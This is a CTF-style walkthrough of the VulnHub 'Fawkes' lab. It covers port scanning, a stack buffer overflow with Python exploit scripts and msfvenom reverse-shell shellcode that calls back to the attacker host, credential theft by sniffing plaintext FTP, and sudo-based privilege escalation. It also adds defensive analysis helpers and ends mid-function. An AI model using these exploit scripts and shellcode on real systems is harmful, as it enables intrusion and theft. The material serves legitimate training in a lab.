VulnHub lab walkthrough --- Fawkes
2023-09-12 10:47:28

Information gathering

└─\# cat nmapscan/info
# Nmap 7.93 scan initiated Tue Aug  1 02:28:13 2023 as: nmap -sT -sV -sC -O -p21,22,80,2222,9898 -o nmapscan/info 10.20.22.134 
Nmap scan report for 10.20.22.134                                                                                              
Host is up (0.00060s latency).                                                                                                 
PORT     STATE SERVICE    VERSION                                                                                              
21/tcp   open  ftp        vsftpd 3.0.3                                                                                         
| ftp-anon: Anonymous FTP login allowed (FTP code 230)                                                                         
|_-rwxr-xr-x    1 0        0          705996 Apr 12  2021 server_hogwarts                                                      
| ftp-syst:                                                                                                                    
|   STAT:                                                                                                                      
| FTP server status:                                                                                                           
|      Connected to ::ffff:10.20.22.128                                                                                        
|      Logged in as ftp                                                                                                        
|      TYPE: ASCII                                                                                                             
|      No session bandwidth limit                                                                                              
|      Session timeout in seconds is 300                                                                                       
|      Control connection is plain text                                                                                        
|      Data connections will be plain text                                                                                     
|      At session startup, client count was 5                                                                                  
|      vsFTPd 3.0.3 - secure, fast, stable                                                                                     
|_End of status                                                                                                                
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                                       
| ssh-hostkey:                                                                                                                 
|   2048 48df48372594c4746b2c6273bfb49fa9 (RSA)                                                                                
|   256 1e3418175e17958f702f80a6d5b4173e (ECDSA)                                                                               
|_  256 3e795f55553b127596b43ee3837a5494 (ED25519)
80/tcp   open  http       Apache httpd 2.4.38 ((Debian))                                
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)                   
2222/tcp open  ssh        OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey:                 
|   3072 c41dd5668524574a864ed9b60069788d (RSA)
|   256 0b31e76726c64d12bf2a8531bf21311d (ECDSA)
|_  256 9bf4bd71fa16ded589ac698d1e93e58a (ED25519)
9898/tcp open  monkeycom?                                      
| fingerprint-strings:                                         
|   GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     Welcome to Hogwart's magic portal                        
|     Tell your spell and ELDER WAND will perform the magic
|     Here is list of some common spells:                      
|     Wingardium Leviosa                                       
|     Lumos                    
|     Expelliarmus             
|     Alohomora                
|     Avada Kedavra            
|     Enter your spell: Magic Output: Oops!! you have given the wrong spell
|     Enter your spell:                                        
|   NULL:                      
|     Welcome to Hogwart's magic portal                        
|     Tell your spell and ELDER WAND will perform the magic
|     Here is list of some common spells:                      
|     Wingardium Leviosa                                       
|     Lumos
|     Expelliarmus             
|     Alohomora                
|     Avada Kedavra            
|_    Enter your spell:                                        
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9898-TCP:V=7.93%I=7%D=8/1%Time=64C8A606%P=x86_64-pc-linux-gnu%r(NUL
SF:L,DE,"Welcome\x20to\x20Hogwart's\x20magic\x20portal\nTell\x20your\x20sp
SF:ell\x20and\x20ELDER\x20WAND\x20will\x20perform\x20the\x20magic\n\nHere\
SF:x20is\x20list\x20of\x20some\x20common\x20spells:\n1\.\x20Wingardium\x20
SF:Leviosa\n2\.\x20Lumos\n3\.\x20Expelliarmus\n4\.\x20Alohomora\n5\.\x20Av
SF:ada\x20Kedavra\x20\n\nEnter\x20your\x20spell:\x20")%r(GenericLines,125,
SF:"Welcome\x20to\x20Hogwart's\x20magic\x20portal\nTell\x20your\x20spell\x
SF:20and\x20ELDER\x20WAND\x20will\x20perform\x20the\x20magic\n\nHere\x20is
SF:\x20list\x20of\x20some\x20common\x20spells:\n1\.\x20Wingardium\x20Levio
SF:sa\n2\.\x20Lumos\n3\.\x20Expelliarmus\n4\.\x20Alohomora\n5\.\x20Avada\x
SF:20Kedavra\x20\n\nEnter\x20your\x20spell:\x20Magic\x20Output:\x20Oops!!\
SF:x20you\x20have\x20given\x20the\x20wrong\x20spell\n\nEnter\x20your\x20sp
SF:ell:\x20")%r(GetRequest,125,"Welcome\x20to\x20Hogwart's\x20magic\x20por
SF:tal\nTell\x20your\x20spell\x20and\x20ELDER\x20WAND\x20will\x20perform\x
SF:20the\x20magic\n\nHere\x20is\x20list\x20of\x20some\x20common\x20spells:
SF:\n1\.\x20Wingardium\x20Leviosa\n2\.\x20Lumos\n3\.\x20Expelliarmus\n4\.\
SF:x20Alohomora\n5\.\x20Avada\x20Kedavra\x20\n\nEnter\x20your\x20spell:\x2
SF:0Magic\x20Output:\x20Oops!!\x20you\x20have\x20given\x20the\x20wrong\x20
SF:spell\n\nEnter\x20your\x20spell:\x20")%r(HTTPOptions,125,"Welcome\x20to
SF:\x20Hogwart's\x20magic\x20portal\nTell\x20your\x20spell\x20and\x20ELDER
SF:\x20WAND\x20will\x20perform\x20the\x20magic\n\nHere\x20is\x20list\x20of
SF:\x20some\x20common\x20spells:\n1\.\x20Wingardium\x20Leviosa\n2\.\x20Lum
SF:os\n3\.\x20Expelliarmus\n4\.\x20Alohomora\n5\.\x20Avada\x20Kedavra\x20\
SF:n\nEnter\x20your\x20spell:\x20Magic\x20Output:\x20Oops!!\x20you\x20have
SF:\x20given\x20the\x20wrong\x20spell\n\nEnter\x20your\x20spell:\x20")%r(R
SF:TSPRequest,125,"Welcome\x20to\x20Hogwart's\x20magic\x20portal\nTell\x20
SF:your\x20spell\x20and\x20ELDER\x20WAND\x20will\x20perform\x20the\x20magi
SF:c\n\nHere\x20is\x20list\x20of\x20some\x20common\x20spells:\n1\.\x20Wing
SF:ardium\x20Leviosa\n2\.\x20Lumos\n3\.\x20Expelliarmus\n4\.\x20Alohomora\
SF:n5\.\x20Avada\x20Kedavra\x20\n\nEnter\x20your\x20spell:\x20Magic\x20Out
SF:put:\x20Oops!!\x20you\x20have\x20given\x20the\x20wrong\x20spell\n\nEnte
SF:r\x20your\x20spell:\x20");                                  
MAC Address: 00:0C:29:CC:67:05 (VMware)                        
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose                                   
Running: Linux 4.X|5.X                                         
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6                                   
Network Distance: 1 hop                                        
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug  1 02:29:14 2023 -- 1 IP address (1 host up) scanned in 61.12 seconds
// From the banner on port 9898 we can roughly infer that a buffer overflow vulnerability may exist

Port exploitation

FTP (port 21)

└─\# ftp 10.20.22.134
Connected to 10.20.22.134.
220 (vsFTPd 3.0.3)
Name (10.20.22.134:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||18099|)
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0          705996 Apr 12  2021 server_hogwarts
226 Directory send OK.
ftp> 
// Anonymous login yields a 32-bit Linux executable
└─\# file server_hogwarts 
server_hogwarts: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, BuildID[sha1]=1d09ce1a9929b282f26770218b8d247716869bd0, for GNU/Linux 3.2.0, not stripped

Web (port 80)

The web side is just a single image; downloading it turned up no steganographic content. No web framework could be identified, and directory brute-forcing found nothing either, so there is nothing exploitable here.

Port 9898

This port runs a web-like service; opening it in a browser only prints a static page.

└─\# nc 10.20.22.134 9898    
Welcome to Hogwart's magic portal
Tell your spell and ELDER WAND will perform the magic

Here is list of some common spells:
1. Wingardium Leviosa
2. Lumos
3. Expelliarmus
4. Alohomora
5. Avada Kedavra 

Enter your spell: 2
Magic Output: Oops!! you have given the wrong spell

Enter your spell: 2
Magic Output: Oops!! you have given the wrong spell

Enter your spell: 32
Magic Output: Oops!! you have given the wrong spell

Enter your spell: 

After connecting with nc there is an interactive prompt that accepts input; sending a hundred-odd characters in a row crashes the program. The file retrieved over FTP prints nothing when executed, but checking the listening ports shows it has opened local port 9898.

└─\# nc 127.0.0.1 9898
Welcome to Hogwart's magic portal
Tell your spell and ELDER WAND will perform the magic

Here is list of some common spells:
1. Wingardium Leviosa
2. Lumos
3. Expelliarmus
4. Alohomora
5. Avada Kedavra 

Enter your spell: 

The program can also be run locally, so it is tested with the local edb-debugger
![[Screenshot_2023-08-01_08_42_38.png]]
This tool is similar to Immunity Debugger on Windows: it lets you inspect the contents of the CPU registers while the program runs.

Connect and test how many bytes trigger the overflow

#!/usr/bin/python
# Python 2 (run with python2 below): send a growing buffer of 'A's to the local
# copy of server_hogwarts until the service stops accepting connections.
import socket
import time
import sys
size = 100
while True:
    try:
        print("Now use size is %s" % size)
        buffer = 'A' * size
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("127.0.0.1", 9898))
        s.send(buffer)
        s.close()      # the original had s.close without parentheses, which never closed the socket

        size += 100    # grow by 100 bytes per round
        time.sleep(3)  # give the service time to crash before the next attempt
    except socket.error:
        print("connected refuse")
        sys.exit()
└─\# python2 exp.py
Now use size is 100        
connected refuse
// When size grows to 200 the connection is dropped: the overflow happens and the program pauses.

Test exactly at which byte the overflow occurs and which register it overflows into

Use msf to generate a 200-byte pattern string

└─\# msf-pattern_create -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
#!/usr/bin/python
# Python 2: send the 200-byte msf pattern; the value that lands in EIP identifies the offset.
import socket
import time
import sys
try:
    buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag'
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("127.0.0.1", 9898))
    s.send(buffer)
    s.close()          # the original had s.close without parentheses
    time.sleep(3)
except socket.error:
    sys.exit()

In edb-debugger locate the memory address held in the EIP register. The CPU executes memory from top to bottom, and EIP points to the next memory address (this is my own understanding).
![[Screenshot_2023-08-01_09_17_46 1.png]]
EIP holds the address 64413764, so the program overflows from this address onward

└─\# msf-pattern_offset -l 200 -q 64413764
[*] Exact match at offset 112

Tracing the bytes with msf shows the overflow begins after byte 112, i.e. bytes 113, 114, 115 and 116 are the address in the EIP register, and the overflowing data after that is written to the ESP stack register.
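As an added illustration that is not part of the original walkthrough (Python 3; the function names are my own), the following reproduces what msf-pattern_create and msf-pattern_offset do and shows why the answer is 112: the value 0x64413764 read from EIP on little-endian x86 sits in memory as the bytes 64 37 41 64, i.e. the ASCII string "d7Ad", and that substring starts 112 bytes into the pattern. The pattern only stays unique for 26*26*10 triplets (20280 bytes); beyond that a match is ambiguous.

```python
import struct
from string import ascii_uppercase, ascii_lowercase, digits


def pattern_create(length):
    """Rebuild the Metasploit-style cyclic pattern (Aa0 Aa1 ... Aa9 Ab0 ...) truncated to `length`."""
    chunks = []
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(length, eip_value):
    """Return the offset of the bytes that overwrote EIP, or -1 if they are not in the pattern.

    The debugger shows EIP as a 32-bit number; on little-endian x86 the lowest byte was
    stored first, so 0x64413764 was written to memory as 64 37 41 64, i.e. b'd7Ad'.
    Searching on bytes avoids decode errors for register values that are not ASCII."""
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).encode("ascii").find(needle)


if __name__ == "__main__":
    print(pattern_create(200))
    print("EIP 0x64413764 -> offset", pattern_offset(200, 0x64413764))
```

The bytes-level search is the reason pattern_offset is given the register value rather than the string you see in the hex dump: the tool does the byte reversal for you, which is the step that is easy to get wrong when reading the register by eye.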

Enlarging the ESP region

Since the payload we write may need a relatively long byte length, enlarge the ESP region appropriately

#!/usr/bin/python
# Python 2: 112 bytes of filler up to EIP, 4 bytes that land in EIP ("BBBB"),
# then 500 bytes of "C" to see how much of the data ends up in the region ESP points to.
import socket
import time
import sys
try:
    buffer = "A" * 112 + "B" * 4 + "C" * 500
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("127.0.0.1", 9898))
    s.send(buffer)
    s.close()          # the original had s.close without parentheses
    time.sleep(3)
except socket.error:
    sys.exit()

![[Screenshot_2023-08-01_09_28_23.png]]
We can see the overflowed string was written into the ESP register

Locating the ESP address

Once EAX overflows, EIP is redirected to ESP and the bytes are stored in the ESP register, so by finding ESP's address the reverse-shell payload can be written into the ESP register; in assembly this is the address of a jmp esp instruction. The opcode search in edb-debugger finds the address of jmp esp
![[Screenshot_2023-08-01_09_33_28.png]]

Generating the payload

└─\# msfvenom -p linux/x86/shell_reverse_tcp lhost=10.20.22.128 lport=4545 -b "\x00" -e x86\shikata_ga_nai -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
[-] Skipping invalid encoder x86shikata_ga_nai
[!] Couldn't find encoder to use
No encoder specified, outputting raw payload
Payload size: 68 bytes
Final size of c file: 311 bytes
unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd"
"\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x0a\x14\x16"
"\x80\x68\x02\x00\x11\xc1\x89\xe1\xb0\x66\x50\x51\x53\xb3"
"\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
"\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

#!/usr/bin/python
# Python 2: 112 bytes of filler, the jmp esp address (0x08049d55, little-endian) in EIP,
# a NOP sled, then the msfvenom reverse-shell payload.
import socket
import time
import sys
try:
    payload = ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd"
               "\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x0a\x14\x16"
               "\x80\x68\x02\x00\x11\xc1\x89\xe1\xb0\x66\x50\x51\x53\xb3"
               "\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
               "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80")
    buffer = "A" * 112 + "\x55\x9d\x04\x08" + "\x90" * 16 + payload
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("127.0.0.1", 9898))
    s.send(buffer)
    s.close()          # the original had s.close without parentheses
    time.sleep(3)
except socket.error:
    sys.exit()

// Write the ESP address. "\x90" is the NOP no-operation; because shikata_ga_nai encoding was used, 16 NOP bytes are inserted before the payload.

Running the script, the reverse shell may fail to arrive on port 4545 because the port is occupied, but a listener on port 443 received the reverse shell successfully

└─\# nc -lvnp 443
listening on [any] 443 ...
connect to [10.20.22.128] from (UNKNOWN) [10.20.22.134] 33056
whoami
harry
ls -liah
total 60K    
 264484 drwxr-sr-x    1 harry    harry       4.0K Aug  1 14:49 .
 264483 drwxr-xr-x    1 root     root        4.0K Apr 13  2021 ..
 264485 lrwxrwxrwx    1 root     harry          9 Apr 13  2021 .ash_history -> /dev/null
 264466 -rw-r--r--    1 root     harry         24 Apr 13  2021 .mycreds.txt
 389974 -rw-------    1 harry    harry     312.0K Aug  1 14:49 core
cat .mycreds.txt
HarrYp0tter@Hogwarts123

A string that looks like a password was found

Obtaining an initial foothold

SSH (port 22)

└─# ssh harry@10.20.22.134        
harry@10.20.22.134's password: 
 
Permission denied, please try again.
harry@10.20.22.134's password: 
Permission denied, please try again.
harry@10.20.22.134's password: 

Login fails

SSH (port 2222)

During the earlier information gathering, port 2222 was also found to run an SSH service

└─# ssh harry@10.20.22.134 -p 2222
harry@10.20.22.134's password: 
Permission denied, please try again.
harry@10.20.22.134's password: 
Permission denied, please try again.
harry@10.20.22.134's password: 
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <http://wiki.alpinelinux.org/>.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

2b1599256ca6:~$ whoami
harry
2b1599256ca6:~$ 

A fairly complete session is obtained

2b1599256ca6:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
4: eth0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP 
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever

But the IP address is not the target's IP address, which suggests a Docker environment

Privilege escalation

Docker privilege escalation

2b1599256ca6:~$ sudo -l
User harry may run the following commands on 2b1599256ca6:
    (ALL) NOPASSWD: ALL
2b1599256ca6:~$ sudo /bin/ash
2b1599256ca6:/home/harry# whoami
root
2b1599256ca6:/home/harry# 

User harry can run everything as root, and the passwd file shows that root's login shell is ash.

2b1599256ca6:/home/harry# cd /root
2b1599256ca6:~# ls
horcrux1.txt  note.txt
2b1599256ca6:~# cat note.txt 
Hello Admin!!

We have found that someone is trying to login to our ftp server by mistake.You are requested to analyze the traffic and figure out the user.

In root's home directory there is the flag along with a note file saying that someone keeps trying to log into the FTP service, so check the FTP service's log

Tue Aug  1 23:02:02 2023 [pid 19] [neville] FAIL LOGIN: Client "172.17.0.1"
Tue Aug  1 23:04:01 2023 [pid 39] CONNECT: Client "172.17.0.1"
Tue Aug  1 23:04:03 2023 [pid 38] [neville] FAIL LOGIN: Client "172.17.0.1"
Tue Aug  1 23:06:01 2023 [pid 53] CONNECT: Client "172.17.0.1"
Tue Aug  1 23:06:03 2023 [pid 52] [neville] FAIL LOGIN: Client "172.17.0.1"
Tue Aug  1 23:08:01 2023 [pid 66] CONNECT: Client "172.17.0.1"
Tue Aug  1 23:08:03 2023 [pid 65] [neville] FAIL LOGIN: Client "172.17.0.1"
Tue Aug  1 23:10:01 2023 [pid 78] CONNECT: Client "172.17.0.1"
Tue Aug  1 23:10:04 2023 [pid 77] [neville] FAIL LOGIN: Client "172.17.0.1"
2b1599256ca6:/var/log# 

Only part of the log is shown; the full log shows this request has been sent continuously from the moment the machine booted right through the pentest, so use tcpdump to capture and analyze the traffic and determine what this request is doing. Other capture tools could be used as well.
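As an added example, not part of the original walkthrough: the same log can be triaged programmatically. The Python 3 script below parses vsftpd.log lines (the sample lines are constructed in the same format as the excerpt above, with one extra anonymous OK LOGIN entry), groups FAIL LOGIN events per user and client, and reports the smallest and largest gap between attempts. A near-constant gap, as here (about 120 seconds), points to a scheduled job rather than a person, which is exactly what the note in /root was hinting at. The function names are my own.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in vsftpd.log format, shaped like the excerpt above (plus one anonymous
# OK LOGIN line so the report has something to ignore); not copied from a live system.
SAMPLE_LOG = """\
Tue Aug  1 23:02:02 2023 [pid 19] [neville] FAIL LOGIN: Client "172.17.0.1"
Tue Aug  1 23:04:01 2023 [pid 39] CONNECT: Client "172.17.0.1"
Tue Aug  1 23:04:03 2023 [pid 38] [neville] FAIL LOGIN: Client "172.17.0.1"
Tue Aug  1 23:06:01 2023 [pid 53] CONNECT: Client "172.17.0.1"
Tue Aug  1 23:06:03 2023 [pid 52] [neville] FAIL LOGIN: Client "172.17.0.1"
Tue Aug  1 23:07:10 2023 [pid 60] [ftp] OK LOGIN: Client "10.20.22.128", anon password "?"
Tue Aug  1 23:08:01 2023 [pid 66] CONNECT: Client "172.17.0.1"
Tue Aug  1 23:08:03 2023 [pid 65] [neville] FAIL LOGIN: Client "172.17.0.1"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'(?:\[(?P<user>[^\]]+)\] )?(?P<event>[A-Z ]+?): Client "(?P<client>[^"]+)"'
)


def parse_vsftpd_log(text):
    """Turn vsftpd.log lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "time": datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y"),
            "user": m.group("user"),        # None for CONNECT lines
            "event": m.group("event"),
            "client": m.group("client"),
        })
    return events


def failed_login_report(events, threshold=3):
    """Group FAIL LOGIN events by (user, client) and report groups with at least `threshold`
    failures, with the smallest and largest gap (seconds) between consecutive attempts.
    Near-identical gaps mean a scheduled job; a human or a brute-forcer looks different."""
    fails = defaultdict(list)
    for e in events:
        if e["event"] == "FAIL LOGIN":
            fails[(e["user"], e["client"])].append(e["time"])
    report = {}
    for key, times in fails.items():
        if len(times) < threshold:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        report[key] = {
            "count": len(times),
            "first": times[0],
            "last": times[-1],
            "min_gap_s": min(gaps) if gaps else None,
            "max_gap_s": max(gaps) if gaps else None,
        }
    return report


if __name__ == "__main__":
    for (user, client), info in failed_login_report(parse_vsftpd_log(SAMPLE_LOG)).items():
        print("%s from %s: %d failures, gap %.0f-%.0f s" % (
            user, client, info["count"], info["min_gap_s"], info["max_gap_s"]))
```

Run it against a real /var/log/vsftpd.log by replacing SAMPLE_LOG with the file contents; the CONNECT and OK LOGIN lines are parsed but only FAIL LOGIN counts toward the report.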

23:14:01.941787 IP 172.17.0.1.47240 > 2b1599256ca6.21: Flags [P.], seq 1:15, ack 21, win 502, options [nop,nop,TS val 1053542475 ecr 2894985301], length 14: FTP: USER neville
23:14:01.941789 IP 2b1599256ca6.21 > 172.17.0.1.47240: Flags [.], ack 15, win 510, options [nop,nop,TS val 2894985302 ecr 1053542475], length 0
23:14:01.941811 IP 2b1599256ca6.21 > 172.17.0.1.47240: Flags [P.], seq 21:55, ack 15, win 510, options [nop,nop,TS val 2894985302 ecr 1053542475], length 34: FTP: 331 Please specify the password.
23:14:01.941836 IP 172.17.0.1.47240 > 2b1599256ca6.21: Flags [P.], seq 15:30, ack 55, win 502, options [nop,nop,TS val 1053542475 ecr 2894985302], length 15: FTP: PASS bL!Bsg3k

We can see user neville accessing the service and authenticating, and the password is sent in plaintext
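For the traffic side, here is an added Python 3 example (not from the original walkthrough) that scans tcpdump's text output for FTP control-channel commands and reports any credentials crossing the wire in the clear, masking the password in the report. The sample lines are constructed to mirror the capture above; the password value is a placeholder, not the lab's. This is the check a defender runs against an FTP server to show it needs FTPS or SFTP instead of plaintext authentication. The function names are my own.

```python
import re

# Constructed tcpdump text lines in the same shape as the capture above (one FTP login attempt
# plus an unrelated AUTH TLS line); the password is a placeholder, not the lab's.
SAMPLE_CAPTURE = """\
23:14:01.941787 IP 172.17.0.1.47240 > 2b1599256ca6.21: Flags [P.], seq 1:15, ack 21, win 502, options [nop,nop,TS val 1053542475 ecr 2894985301], length 14: FTP: USER neville
23:14:01.941789 IP 2b1599256ca6.21 > 172.17.0.1.47240: Flags [.], ack 15, win 510, options [nop,nop,TS val 2894985302 ecr 1053542475], length 0
23:14:01.941811 IP 2b1599256ca6.21 > 172.17.0.1.47240: Flags [P.], seq 21:55, ack 15, win 510, options [nop,nop,TS val 2894985302 ecr 1053542475], length 34: FTP: 331 Please specify the password.
23:14:01.941836 IP 172.17.0.1.47240 > 2b1599256ca6.21: Flags [P.], seq 15:30, ack 55, win 502, options [nop,nop,TS val 1053542475 ecr 2894985302], length 15: FTP: PASS PLACEHOLDER-pw
23:14:02.100000 IP 2b1599256ca6.21 > 172.17.0.1.47240: Flags [P.], seq 55:77, ack 30, win 510, options [nop,nop,TS val 2894985400 ecr 1053542475], length 22: FTP: 530 Login incorrect.
23:15:00.000001 IP 10.20.22.128.40000 > 2b1599256ca6.21: Flags [P.], seq 1:11, ack 21, win 502, options [nop,nop,TS val 1 ecr 2], length 10: FTP: AUTH TLS
"""

# tcpdump prints "host.port > host.port:" and, when it decodes FTP, "FTP: <command> <argument>".
LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>\S+) > (?P<dst>\S+): .*? FTP: (?P<cmd>\S+)(?: (?P<arg>.*))?$"
)


def mask(secret):
    """Keep the first character so a reviewer can correlate findings, hide the rest."""
    return secret[:1] + "*" * (len(secret) - 1) if secret else ""


def find_cleartext_ftp_logins(capture_text):
    """Return one finding per PASS command seen in the clear on a client -> port 21 flow,
    paired with the USER that preceded it on the same flow."""
    pending_user = {}
    findings = []
    for line in capture_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue            # e.g. pure ACKs with no decoded FTP payload
        src, dst, cmd = m.group("src"), m.group("dst"), m.group("cmd")
        arg = m.group("arg") or ""
        server, port = dst.rsplit(".", 1)
        if port != "21":
            continue            # only client-to-server control-channel traffic
        flow = (src, dst)
        if cmd == "USER":
            pending_user[flow] = arg
        elif cmd == "PASS":
            findings.append({
                "time": m.group("ts"),
                "client": src.rsplit(".", 1)[0],
                "server": server,
                "user": pending_user.get(flow),
                "password": mask(arg),
            })
    return findings


if __name__ == "__main__":
    for f in find_cleartext_ftp_logins(SAMPLE_CAPTURE):
        print("%s cleartext FTP login %s -> %s user=%s pass=%s" % (
            f["time"], f["client"], f["server"], f["user"], f["password"]))
```

Feed it the output of something like `tcpdump -i docker0 -nn -A port 21` saved to a file; only the client-to-server direction on port 21 is inspected, so server replies such as the 331 and 530 lines are parsed but ignored.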

Lateral movement

└─\# ssh neville@10.20.22.134             
neville@10.20.22.134's password: 
Linux Fawkes 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug  1 22:48:48 2023 from 172.17.0.2
neville@Fawkes:~$ 

The SSH service on port 22 can be logged into directly, which shows that the SSH service on port 2222 is the one exposed for logging into the Docker container.

Kernel privilege escalation

neville@Fawkes:~$ sudo --version
Sudo version 1.8.27
Sudoers policy plugin version 1.8.27
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.27
neville@Fawkes:~$ uname -a
Linux Fawkes 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux

The vulnerability comes from sudo escaping backslashes in arguments incorrectly.
Normally, when a command line is run through a shell (sudo -s or sudo -i), sudo escapes special characters. But -s or -i can also be used to run sudoedit, and in that case the special characters are in fact not escaped, which can lead to a buffer overflow. Same trick, different road.
Use the exploit from GitHub directly:
https://github.com/worawit/CVE-2021-3156/blob/main/exploit_nss.py
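A defender who wants to confirm exposure to CVE-2021-3156 before trusting a third-party exploit can start from the version string. The following Python 3 example is added here and is not part of the original walkthrough or the linked repository; the affected ranges come from the public advisory (upstream 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1, fixed in 1.9.5p2). One caveat the version string cannot resolve: distributions backport fixes without bumping the upstream number, so a patched Debian 10 package still reports "Sudo version 1.8.27"; classify_sudoedit_output interprets the advisory's behavioural test instead (`sudoedit -s /` prints "not a regular file" on a vulnerable build and a usage message on a patched one). The function names are my own.

```python
import re

# Affected upstream ranges per the CVE-2021-3156 advisory: 1.8.2..1.8.31p2 and 1.9.0..1.9.5p1.
# Versions are compared as (major, minor, patch, p-level) tuples; a missing "pN" suffix is p0.
AFFECTED_RANGES = [
    ((1, 8, 2, 0), (1, 8, 31, 2)),
    ((1, 9, 0, 0), (1, 9, 5, 1)),
]

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:p(\d+))?$")

# Constructed sample of `sudo --version` output, shaped like the walkthrough's (Debian 10, sudo 1.8.27).
SAMPLE_SUDO_VERSION = """\
Sudo version 1.8.27
Sudoers policy plugin version 1.8.27
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.27
"""


def parse_sudo_version(text):
    """'1.8.31p2' -> (1, 8, 31, 2); '1.9.5' -> (1, 9, 5, 0)."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised sudo version string: %r" % text)
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def version_from_output(output):
    """Extract the version tuple from the first 'Sudo version X' line of `sudo --version`."""
    for line in output.splitlines():
        m = re.match(r"Sudo version (\S+)", line)
        if m:
            return parse_sudo_version(m.group(1))
    raise ValueError("no 'Sudo version' line found")


def upstream_version_affected(version):
    """True if the upstream version lies in an affected range. A backported distro fix keeps
    the old upstream number, so True means 'check further', not 'confirmed vulnerable'."""
    return any(lo <= version <= hi for lo, hi in AFFECTED_RANGES)


def classify_sudoedit_output(stderr_text):
    """Interpret the output of `sudoedit -s /` (the advisory's behavioural test): a vulnerable
    sudo answers 'sudoedit: /: not a regular file', a patched one prints its usage message."""
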